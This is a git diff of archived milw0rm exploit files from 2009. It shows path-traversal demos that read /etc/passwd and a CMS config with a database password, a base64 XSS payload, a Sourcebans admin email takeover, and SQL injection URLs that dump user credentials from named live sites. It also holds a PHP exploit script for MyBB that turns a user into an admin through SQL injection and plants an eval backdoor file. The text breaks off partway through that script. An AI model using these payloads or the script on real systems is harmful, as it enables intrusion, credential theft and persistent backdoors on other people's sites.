+Vendor:http://www.gravy-media.com/
+Download:register to download
+Dork:"Powered by Gravy Media"
+Discovered By:Lo$er
+
+====Vulnerable code(forcedownload.php)====
+27. $filename = $_GET['file'];
+
+70. readfile("$filename");
+====Demo====
+
+http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8997.txt b/platforms/php/webapps/8997.txt
index a082082f9..ebaa0f0c8 100755
--- a/platforms/php/webapps/8997.txt
+++ b/platforms/php/webapps/8997.txt
@@ -1,57 +1,57 @@
-#X X
-# X X A K KK NN N EEEEEE TTTTTTTT
-# X X A A K K N N N E TT
-# XX AAAAA KK N N N EEE TT
-# X X A A K K N N N E TT
-# X X A A K KK N NN EEEEEE TT
-#X X
-
-Author: S(r1pt - xaknet.ru
-GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..
-
-###
-Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
-Site author: kasseler-cms.net
-###
-
-Readfile:
-http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
-<?php
-/**********************************************/
-/* Kasseler CMS: Content Management System */
-/**********************************************/
-/* */
-/* Copyright (c)2007-2009 by Igor Ognichenko */
-/* http://www.kasseler-cms.net/ */
-/* */
-/**********************************************/
-
-if (!defined('FUNC_FILE')) die('Access is limited');
-
-$database = array(
- 'host' => 'localhost',
- 'user' => 'kasseler_robin',
- 'password' => 'cs010488oia',
- 'name' => 'kasseler_cms',
- 'prefix' => 'kasseler',
- 'type' => 'mysql',
- 'charset' => 'cp1251',
- 'cache' => '',
- 'sql_cache_clear' => 'INSERT,UPDATE,DELETE',
- 'no_cache_tables' => 'sessions'
-);
-?>
-
-vulnerability in engine.php:
-function download(){
-global $config;
- require_once "includes/class/download.php";
- $file = "uploads/".$_GET['file']; #here =)
- $download = new file_download($file, 0, 1024);
- $download->download();
-}
-
-AND XSS bonus:
-http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+
-
-# milw0rm.com [2009-06-22]
+#X X
+# X X A K KK NN N EEEEEE TTTTTTTT
+# X X A A K K N N N E TT
+# XX AAAAA KK N N N EEE TT
+# X X A A K K N N N E TT
+# X X A A K KK N NN EEEEEE TT
+#X X
+
+Author: S(r1pt - xaknet.ru
+GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..
+
+###
+Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
+Site author: kasseler-cms.net
+###
+
+Readfile:
+http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
+<?php
+/**********************************************/
+/* Kasseler CMS: Content Management System */
+/**********************************************/
+/* */
+/* Copyright (c)2007-2009 by Igor Ognichenko */
+/* http://www.kasseler-cms.net/ */
+/* */
+/**********************************************/
+
+if (!defined('FUNC_FILE')) die('Access is limited');
+
+$database = array(
+ 'host' => 'localhost',
+ 'user' => 'kasseler_robin',
+ 'password' => 'cs010488oia',
+ 'name' => 'kasseler_cms',
+ 'prefix' => 'kasseler',
+ 'type' => 'mysql',
+ 'charset' => 'cp1251',
+ 'cache' => '',
+ 'sql_cache_clear' => 'INSERT,UPDATE,DELETE',
+ 'no_cache_tables' => 'sessions'
+);
+?>
+
+vulnerability in engine.php:
+function download(){
+global $config;
+ require_once "includes/class/download.php";
+ $file = "uploads/".$_GET['file']; #here =)
+ $download = new file_download($file, 0, 1024);
+ $download->download();
+}
+
+AND XSS bonus:
+http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8998.txt b/platforms/php/webapps/8998.txt
index 14a733422..256519e76 100755
--- a/platforms/php/webapps/8998.txt
+++ b/platforms/php/webapps/8998.txt
@@ -1,38 +1,38 @@
-Sourcebans (PHP) (sb-callback.php)
-Author: Mr. Anonymous
-------
-Vendor:http://www.sourcebans.com
-Affected Versions: <= 1.4.2
-----
-Exploit (sb-callback lines 185-204):
--------------
-function ChangeEmail($aid, $email)
-{
- ...SNIP...
-
- $GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =
-'".$email."' WHERE `aid` = '".$aid."'");
- $objResponse->addScript("ShowBox('E-mail address changed', 'Your
-E-mail address has been changed successfully.', 'green',
-'index.php?p=account', true);");
- $log = new CSystemLog("m", "E-mail Changed", "E-mail changed for
-admin (".$aid.")");
- return $objResponse;
-}
-------
-How to Exploit
-------
-No checking is done to verify you own that email address. You can
-simply submit a post request with the following arguments, to change
-any admins email with your own (or a temporary one), and then reset
-their password, then get full admin access.
-
-You can download firebug for firefox, and simply run in the console
-"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need
-to send these variables to index.php via POST:
-
-xxajax: ChangeEmail
-xajaxargs[]: ADMIN_ID
-xajaxargs[]: EMAIL_TO_CHANGE_TO
-
-# milw0rm.com [2009-06-22]
+Sourcebans (PHP) (sb-callback.php)
+Author: Mr. Anonymous
+------
+Vendor:http://www.sourcebans.com
+Affected Versions: <= 1.4.2
+-----
+Exploit (sb-callback lines 185-204):
+-------------
+function ChangeEmail($aid, $email)
+{
+ ...SNIP...
+
+ $GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =
+'".$email."' WHERE `aid` = '".$aid."'");
+ $objResponse->addScript("ShowBox('E-mail address changed', 'Your
+E-mail address has been changed successfully.', 'green',
+'index.php?p=account', true);");
+ $log = new CSystemLog("m", "E-mail Changed", "E-mail changed for
+admin (".$aid.")");
+ return $objResponse;
+}
+-------
+How to Exploit
+-------
+No checking is done to verify you own that email address. You can
+simply submit a post request with the following arguments, to change
+any admins email with your own (or a temporary one), and then reset
+their password, then get full admin access.
+
+You can download firebug for firefox, and simply run in the console
+"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need
+to send these variables to index.php via POST:
+
+xxajax: ChangeEmail
+xajaxargs[]: ADMIN_ID
+xajaxargs[]: EMAIL_TO_CHANGE_TO
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8999.txt b/platforms/php/webapps/8999.txt
index e5b44f2e4..8efcd3e9f 100755
--- a/platforms/php/webapps/8999.txt
+++ b/platforms/php/webapps/8999.txt
@@ -1,43 +1,43 @@
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-Joomla Component com_tickets (id) SQL-injection Vulnerability
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-
-###################################################
-[+] Author : Chip D3 Bi0s
-[+] Email : chipdebios[alt+64]gmail.com
-[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
-[+] Vulnerability : SQL injection
-
-###################################################
-
-Info component:
-ššššššššššššššš
-Name : Tickets
-Version : 0.1 & 2.1
-Author : Paul Coogan
-Author email : paul@ideabuzz.com
-Web author : http://www.ideabuzz.com
-
-###################################################
-
-Example:
-http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
-
-n = id valid
-
-
-Demo Live Joomla : version 2.1
-šššššššššššššššššššššššššššššš
-http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
-
-Demo Live Mambo : Version 0.1
-ššššššššššššššššššššššššššššš
-http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
-
-
-+++++++++++++++++++++++++++++++++++++++
-#[!] Produced in South America
-+++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2009-06-22]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Joomla Component com_tickets (id) SQL-injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+###################################################
+[+] Author : Chip D3 Bi0s
+[+] Email : chipdebios[alt+64]gmail.com
+[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
+[+] Vulnerability : SQL injection
+
+###################################################
+
+Info component:
+ššššššššššššššš
+Name : Tickets
+Version : 0.1 & 2.1
+Author : Paul Coogan
+Author email : paul@ideabuzz.com
+Web author : http://www.ideabuzz.com
+
+###################################################
+
+Example:
+http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
+
+n = id valid
+
+
+Demo Live Joomla : version 2.1
+šššššššššššššššššššššššššššššš
+http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
+
+Demo Live Mambo : Version 0.1
+ššššššššššššššššššššššššššššš
+http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
+
+
++++++++++++++++++++++++++++++++++++++++
+#[!] Produced in South America
++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/9000.txt b/platforms/php/webapps/9000.txt
index e4670ecad..fd22adb98 100755
--- a/platforms/php/webapps/9000.txt
+++ b/platforms/php/webapps/9000.txt
@@ -1,28 +1,28 @@ -======================================================= -+++++++++++++++++++ information +++++++++++++++++++++++ -======================================================= -[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability - -[+] Found by : Mr.tro0oqy - -[+] C0ntact : t.4@windowslive.com <Yemeni ana> -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= -BUGS -==== - -Sql Injections: -rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- - -DEMO -==== -http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= -all my Friends - -# milw0rm.com [2009-06-22] +======================================================= ++++++++++++++++++++ information +++++++++++++++++++++++ +======================================================= +[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability + +[+] Found by : Mr.tro0oqy + +[+] C0ntact : t.4@windowslive.com <Yemeni ana> +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= +BUGS +==== + +Sql Injections: +rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- + +DEMO +==== +http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ 
+======================================================= +all my Friends + +# milw0rm.com [2009-06-22] diff --git a/platforms/php/webapps/9001.php b/platforms/php/webapps/9001.php index c14b8f69e..711d5aae6 100755 --- a/platforms/php/webapps/9001.php +++ b/platforms/php/webapps/9001.php 
@@ -1,431 +1,431 @@ -<?PHP -/* - -Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. -Fucking moron. - -I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag. -Going to update it in the next days. -For historical reason, i'm leaving the original title, but note that is <= 1.4.6 - - -Example: - -paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/ -[.] Initialing. -[+] Logged in. -[+] my_post_key variable found. -[+] Turned On mybb's invisible mode. -[+] Sql code injected. You're now admin. -[+] Admindir found (or --admindir is used): /admin/. -[+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7 -[+] Site correctly backdoored. -[+] Sql code injected. You're now user. -[+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php -All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it. -Have a nice day :P - - -For the curious people: http://mybboard.it/forum/thread-3623.html - -*/ - -/* - -Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit - - -Discovered: About 4 days before the exploit was coded. -Coded: 03-03-2009 -Author: The:Paradox -Release: Not yet. - -No php.ini setting can stop us ! =O -A user (not email confirmed too) is needed. - -Keep private or your keyboard will blew up. 
- - -*/ - - -$mybb = new maibibi2; - - -class maibibi2 -{ - - function __construct () - { - - - - $this->user = $this->get_argv('-u'); - $this->pass = $this->get_argv('-p'); - $this->target = $this->get_argv('-t'); - $this->admindir = $this->get_argv('--admindir'); - $this->oa2u = $this->get_argv('--onlyadmin2user'); - - $this->ip = '67.167.124.135'; - $this->ua = 'Mozilla 5.0'; - $this->bckdr = '/cache/themes/themes.php'; - - if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False) $this->help(); - if (!$this->user || !$this->pass) die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n"); - if (!$this->target) die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n"); - - $this->http(); - $this->init(); - - - } - - function help () - { - - die ("Under Construction\r\n"); - - } - - function get_argv ($what) - { - global $argv; - - if (!$n = array_search($what, $argv)) return False; - return $argv[$n+1]; - } - - function init () - { - - set_time_limit(0); // about 30 seconds left? Be serious. - - echo "[.] Initialing.\r\n"; - - if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n"); - - echo "[+] Logged in.\r\n"; - - if (!$this->mypostkey = $this->getmypostkey()) die ("My_Post_Key Not Found.\r\n"); - - echo "[+] my_post_key variable found.\r\n"; - - $this->hidemefromonlinelist(); - - echo "[+] Turned On mybb's invisible mode.\r\n"; - - $this->user2admin(); - - echo "[+] Sql code injected. 
You're now admin.\r\n"; - - if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n"); - - echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n"; - - if (!$this->adminsid = $this->loginadmin()) die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n"); - - echo "[+] Admin sid Found: {$this->adminsid}\r\n"; - #$this->writabledirs(); - $this->rce (); - if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n"); - - echo "[+] Site correctly backdoored.\r\n"; - - $this->admin2user(); - - echo "[+] Sql code injected. You're now user.\r\n"; - echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n"; - echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n"; - - } - - function ilovecookies () - { - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua); - $this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login'); - - $rsp = $this->post ("{$this->target}/member.php"); - - if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False; - - return $res[1][0]; - - - } - - function getmypostkey () - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};"); - $rsp = $this->get ("{$this->target}/usercp.php?action=profile"); - - if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False; - - return $res[1][0]; - - } - - function hidemefromonlinelist() - - { - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => 
"{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); - $this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options'); - - $rsp = $this->post ("{$this->target}/member.php"); - - } - - function user2admin () - - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); - $this->postdata = array ('my_post_key' => $this->mypostkey, - 'invisible' => '1', - 'bday1' => '', - 'bday2' => '', - 'bday3' => '', - 'website' => 'http%3A%2F%2F', - 'profile_fields%5Bfid3%5D' => 'Undisclosed', - 'profile_fields%5Bfid2%5D' => 'Undisclosed', - 'profile_fields%5Bfid1%5D' => 'Undisclosed', - 'usertitle' => '', - 'icq' => '', - 'aim' => '', - 'msn' => '', - 'yahoo' => '', - 'away' => '0', - 'awayreason' => '', - 'awayday' => '', - 'awaymonth' => '', - 'awayyear' => '', - 'birthdayprivacy' => "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='", - 'action' => 'do_profile', - 'regsubmit' => '1'); - - $rsp = $this->post ("{$this->target}/usercp.php"); - - } - - function findadmindir () - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); - $rsp = $this->get("{$this->target}/index.php"); - - - if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin --> - — <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False; - - return $res[1][0]; - - - - } - - function loginadmin () - - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); - $this->postdata = array ('username' => $this->user, 'password' => 
$this->pass, 'do' => 'login'); - - $rsp = $this->post ("{$this->target}/{$this->admindir}/index.php"); - - if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False; - - return $res[1][0]; - } - - function writabledirs () - { - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); - $this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ; - - - } - - - function rceOld () - - { - - //edits inc/functions.php (original one) - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); - $this->postdata = array ('my_post_key' => $this->mypostkey, - 'o_o' => 'phpinfo();', - 'regex' => '(.*%3F)#e%00', - 'replacement' => 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', - 'test_value' => 'XoD'); - - $rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode"); - - - } - - function rce () - - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); - $this->postdata = array ('my_post_key' => $this->mypostkey, - 'o_o' => 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', - 'regex' => '(.*%3F)#e%00', - 'replacement' => 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', - 'test_value' => 'XoD', - 'file' => "../{$this->bckdr}"); - - $rsp = $this->post 
("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode"); - - - } - - - function admin2user () - - { - - $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); - $this->postdata = array ('my_post_key' => $this->mypostkey, - 'invisible' => '1', - 'bday1' => '', - 'bday2' => '', - 'bday3' => '', - 'website' => 'http%3A%2F%2F', - 'profile_fields%5Bfid3%5D' => 'Undisclosed', - 'profile_fields%5Bfid2%5D' => 'Undisclosed', - 'profile_fields%5Bfid1%5D' => 'Undisclosed', - 'usertitle' => '', - 'icq' => '', - 'aim' => '', - 'msn' => '', - 'yahoo' => '', - 'away' => '0', - 'awayreason' => '', - 'awayday' => '', - 'awaymonth' => '', - 'awayyear' => '', - 'birthdayprivacy' => "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='", - 'action' => 'do_profile', - 'regsubmit' => '1'); - - $rsp = $this->post ("{$this->target}/usercp.php"); - - } - - function checkrce_old () - - { - $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); - $rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?"); - - if (!strstr($rsp,'.:31337:.')) return False; - else return True; - - } - - function checkrce () - - { - $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); - $rsp = $this->get ("{$this->target}/{$this->bckdr}"); - - if (!strstr($rsp,'.:31337:.')) return False; - else return True; - - } - - - function http ($port = 80, $header = array(), $post = array(), $timeout = 30) - { - - $this->port = $port; - $this->timeout = $timeout; - $this->header = $header; - $this->postdata = $post; - } - - function get ($url) - { - $this->url = parse_url($url); - $this->packet = array(); - - $this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} 
HTTP/1.1"; - $this->packet[] = "Host: {$this->url['host']}"; - - foreach ($this->header as $header => $value) - { - $this->packet[] = "$header: $value"; - } - - $this->packet[] = "\r\n\r\n"; - $this->packet = implode ("\r\n",$this->packet); - - return $this->conn(); - } - - function post ($url) - { - $this->url = parse_url($url); - - $this->packet = array(); - $this->postcontent = ''; - - $this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1"; - $this->packet[] = "Host: {$this->url['host']}"; - - foreach ($this->header as $header => $value) - { - $this->packet[] = "$header: $value"; - } - - foreach ($this->postdata as $post => $value) - { - if ($this->postcontent != '') $this->postcontent .= '&'; - $this->postcontent .= "$post=$value"; - } - - $this->packet[] = 'Content-Type: application/x-www-form-urlencoded'; - $this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n"; - $this->packet[] = $this->postcontent; - - $this->packet = implode ("\r\n",$this->packet); - - return $this->conn(); - } - - - function conn() - { - if (!isset($this->url['port'])) $this->url['port'] = $this->port; - - $sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout); - - if (!is_resource($sk)) return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ; - - else { - - fputs($sk, $this->packet); - $rsp = ""; - - while (!feof($sk)) - { - $rsp .= fgets ($sk, 1024); - } - } - - fclose($sk); - return $rsp; - } - - - -} - - - - -?> - -# milw0rm.com [2009-06-22] +<?PHP +/* + +Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. +Fucking moron. + +I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag. +Going to update it in the next days. 
+For historical reason, i'm leaving the original title, but note that is <= 1.4.6 + + +Example: + +paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/ +[.] Initialing. +[+] Logged in. +[+] my_post_key variable found. +[+] Turned On mybb's invisible mode. +[+] Sql code injected. You're now admin. +[+] Admindir found (or --admindir is used): /admin/. +[+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7 +[+] Site correctly backdoored. +[+] Sql code injected. You're now user. +[+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php +All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it. +Have a nice day :P + + +For the curious people: http://mybboard.it/forum/thread-3623.html + +*/ + +/* + +Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit + + +Discovered: About 4 days before the exploit was coded. +Coded: 03-03-2009 +Author: The:Paradox +Release: Not yet. + +No php.ini setting can stop us ! =O +A user (not email confirmed too) is needed. + +Keep private or your keyboard will blew up. 
+ + +*/ + + +$mybb = new maibibi2; + + +class maibibi2 +{ + + function __construct () + { + + + + $this->user = $this->get_argv('-u'); + $this->pass = $this->get_argv('-p'); + $this->target = $this->get_argv('-t'); + $this->admindir = $this->get_argv('--admindir'); + $this->oa2u = $this->get_argv('--onlyadmin2user'); + + $this->ip = '67.167.124.135'; + $this->ua = 'Mozilla 5.0'; + $this->bckdr = '/cache/themes/themes.php'; + + if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False) $this->help(); + if (!$this->user || !$this->pass) die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n"); + if (!$this->target) die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n"); + + $this->http(); + $this->init(); + + + } + + function help () + { + + die ("Under Construction\r\n"); + + } + + function get_argv ($what) + { + global $argv; + + if (!$n = array_search($what, $argv)) return False; + return $argv[$n+1]; + } + + function init () + { + + set_time_limit(0); // about 30 seconds left? Be serious. + + echo "[.] Initialing.\r\n"; + + if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n"); + + echo "[+] Logged in.\r\n"; + + if (!$this->mypostkey = $this->getmypostkey()) die ("My_Post_Key Not Found.\r\n"); + + echo "[+] my_post_key variable found.\r\n"; + + $this->hidemefromonlinelist(); + + echo "[+] Turned On mybb's invisible mode.\r\n"; + + $this->user2admin(); + + echo "[+] Sql code injected. 
You're now admin.\r\n"; + + if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n"); + + echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n"; + + if (!$this->adminsid = $this->loginadmin()) die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n"); + + echo "[+] Admin sid Found: {$this->adminsid}\r\n"; + #$this->writabledirs(); + $this->rce (); + if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n"); + + echo "[+] Site correctly backdoored.\r\n"; + + $this->admin2user(); + + echo "[+] Sql code injected. You're now user.\r\n"; + echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n"; + echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n"; + + } + + function ilovecookies () + { + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua); + $this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login'); + + $rsp = $this->post ("{$this->target}/member.php"); + + if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False; + + return $res[1][0]; + + + } + + function getmypostkey () + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};"); + $rsp = $this->get ("{$this->target}/usercp.php?action=profile"); + + if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False; + + return $res[1][0]; + + } + + function hidemefromonlinelist() + + { + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => 
"{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); + $this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options'); + + $rsp = $this->post ("{$this->target}/member.php"); + + } + + function user2admin () + + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); + $this->postdata = array ('my_post_key' => $this->mypostkey, + 'invisible' => '1', + 'bday1' => '', + 'bday2' => '', + 'bday3' => '', + 'website' => 'http%3A%2F%2F', + 'profile_fields%5Bfid3%5D' => 'Undisclosed', + 'profile_fields%5Bfid2%5D' => 'Undisclosed', + 'profile_fields%5Bfid1%5D' => 'Undisclosed', + 'usertitle' => '', + 'icq' => '', + 'aim' => '', + 'msn' => '', + 'yahoo' => '', + 'away' => '0', + 'awayreason' => '', + 'awayday' => '', + 'awaymonth' => '', + 'awayyear' => '', + 'birthdayprivacy' => "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='", + 'action' => 'do_profile', + 'regsubmit' => '1'); + + $rsp = $this->post ("{$this->target}/usercp.php"); + + } + + function findadmindir () + { + + $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); + $rsp = $this->get("{$this->target}/index.php"); + + + if (!preg_match_all 